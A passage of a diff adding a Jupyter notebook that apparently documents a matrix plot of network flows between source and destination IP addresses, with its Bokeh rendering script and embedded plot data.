table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;700,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[CategoricalAxis(id='2230', ...)],</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GlyphRenderer(id='2250', ...)],</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='2217', ...),</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='2239', ...),</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'above',</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;900,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;FactorRange(id='2219', ...),</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;CategoricalScale(id='2223', ...),</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;FactorRange(id='2221', ...),</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;CategoricalScale(id='2225', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"2313\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"2312\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 16
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## Showing interactions only\r\n",
+    "\r\n",
+    "Where you do not care about any value associated with the interaction\r\n",
+    "and only want to see if there has been an interaction, you can use\r\n",
+    "the `intersect` parameter"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "source": [
+    "net_df.mp_plot.matrix(\r\n",
+    "    x=\"SourceIP\",\r\n",
+    "    y=\"DestinationIP\",\r\n",
+    "    title=\"External IP flows (intersection)\",\r\n",
+    "    intersect=True,\r\n",
+    "    sort=\"asc\",\r\n",
+    ")"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2517\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2517\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2517\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"5161c325-188a-45cd-8049-b4a695981208\" data-root-id=\"2519\"></div>\n"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/vnd.bokehjs_exec.v0+json": "",
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"9342d9cb-90c3-46be-879b-bc9b7200143b\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"2530\"}],\"center\":[{\"id\":\"2532\"},{\"id\":\"2535\"}],\"height\":700,\"left\":[{\"id\":\"2533\"}],\"outline_line_color\":null,\"renderers\":[{\"id\":\"2553\"}],\"title\":{\"id\":\"2520\"},\"toolbar\":{\"id\":\"2542\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"2522\"},\"x_scale\":{\"id\":\"2526\"},\"y_range\":{\"id\":\"2524\"},\"y_scale\":{\"id\":\"2528\"}},\"id\":\"2519\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"factors\":[\"10.0.3.5\",\"104.43.212.12\",\"13.107.4.50\",\"13.65.107.32\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"13.71.172.130\",\"13.83.148.218\",\"131.107.147.209\",\"157.55.134.136\",\"172.217.15.99\",\"172.217.8.14\",\"20.38.98.100\",\"205.185.216.42\",\"23.4.187.27\",\"23.48.36.78\",\"40.124.45.19\",\"40.77.226.250\",\"40.77.228.69\",\"40.77.232.95\",\"40.91.75.5\",\"52.165.170.112\",\"52.168.138.145\",\"52.239.152.10\",\"65.55.163.76\",\"65.55.44.108\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.81.240\",\"72.21.91.29\",\"8.249.241.254\",\"90.130.70.73\",\"99.84.104.63\"]},\"id\":\"2522\",\"type\":\"FactorRange\"},{\"attributes\":{},\"id\":\"2528\",\"type\":\"CategoricalScale\"},{\"attributes\":{},\"id\":\"2560\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{},\"id\":\"2526\",\"type\":\"CategoricalScale\"},{\"attributes\":{\"data\":{\"DestinationIP\":[\"40.77.228.69\",\"52.168.138.145\",\"13.71.172.130\",\"40.91.75.5\",\"40.124.45.19\",\"13.71.172.128\",\"172.217.15.99\",\"20.38.98.100\",\"104.43.212.12\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"65.55.44.109\",\"13.65.107.32\",\"40.124.45.19\",\"40.77.228.69\",\"52.165.170.112\",\"52.168.138.145\",\"72.21.81.200\",\"13.65.107.32\",\"40.124.45.19\",\"52.168.138.145\",\"65.55.44.109\",\"52.168.138.145\",\"40.124.45.19\",\"72.21.91.29\",\"72.21.81.200\",\"40.91.75.5\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"72.21.81.240\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"13.71.172.128\",\"40.77.232.95\",\"52.165.170.112\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.91.29\",\"52.168.138.145\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"23.48.36.78\",\"52.165.170.112\",\"65.55.44.109\",\"20.38.98.100\",\"8.249.241.254\",\"40.77.228.69\",\"172.217.15.99\",\"13.67.143.117\",\"13.71.172.130\",\"40.124.45.19\",\"40.77.226.250\",\"52.239.152.10\",\"65.55.44.109\",\"90.130.70.73\",\"20.38.98.100\",\"65.55.44.109\",\"13.65.107.32\",\"13.67.143.117\",\"20.38.98.100\",\"13.67.143.117\",\"13.71.172.128\",\"13.71.172.130\",\"13.83.148.218\",\"20.38.98.100\",\"23.4.187.27\",\"40.124.45.19\",\"65.55.44.108\",\"72.21.81.200\",\"72.21.91.29\",\"99.84.104.63\",\"13.65.107.32\",\"40.124.45.19\",\"172.217.15.99\",\"8.249.241.254\",\"13.68.93.109\",\"40.77.228.69\",\"65.55.44.109\",\"52.168.138.145\",\"40.124.45.19\",\"157.55.134.136\"],\"SourceIP\":[\"10.0.3.5\",\"10.0.3.5\",\"104.43.212.12\",\"104.43.212.12\",\"13.107.4.50\",\"13.65.107.32\",\"13.65.107.32\",\"13.65.107.32\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.130\",\"13.71.172.130\",\"13.71.172.130\",\"13.71.172.130\",\"13.83.148.218\",\"131.107.147.209\",\"157.55.134.136\",\"172.217.15.99\",\"172.217.8.14\",\"20.38.98.100\",\"20.38.98.100\",\"20.38.98.100\",\"20.38.98.100\",\"205.185.216.42\",\"23.4.187.27\",\"23.48.36.78\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.77.226.250\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.232.95\",\"40.77.232.95\",\"40.91.75.5\",\"52.165.170.112\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.239.152.10\",\"52.239.152.10\",\"65.55.163.76\",\"65.55.44.108\",\"65.55.44.108\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.81.200\",\"72.21.81.240\",\"72.21.81.240\",\"72.21.91.29\",\"72.21.91.29\",\"72.21.91.29\",\"8.249.241.254\",\"90.130.70.73\",\"99.84.104.63\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85],\"plt_size\":{\"__ndarray__\":\"AAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAUQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAABRAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAeQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAABRAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAABRAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAAFEAAAAAAAAAEQAAAAAAAAARAAAAAAAAAFEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAAFEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAUQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAkQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAUQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[86]},\"row_count\":[1,1,1,1,1,1,1,2,1,1,1,2,1,1,1,1,3,1,1,1,1,1,1,2,1,1,1,1,1,2,1,1,1,1,1,1,2,1,1,2,1,1,1,1,1,2,1,1,1,2,1,1,1,1,1,1,1,1,4,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],\"size\":[1,1,1,1,1,1,1,2,1,1,1,2,1,1,1,1,3,1,1,1,1,1,1,2,1,1,1,1,1,2,1,1,1,1,1,1,2,1,1,2,1,1,1,1,1,2,1,1,1,2,1,1,1,1,1,1,1,1,4,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"2562\"},\"selection_policy\":{\"id\":\"2563\"}},\"id\":\"2518\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"axis_label\":\"SourceIP\",\"axis_line_color\":null,\"formatter\":{\"id\":\"2560\"},\"major_label_orientation\":1.5707963267948966,\"major_label_policy\":{\"id\":\"2559\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"11pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"2531\"}},\"id\":\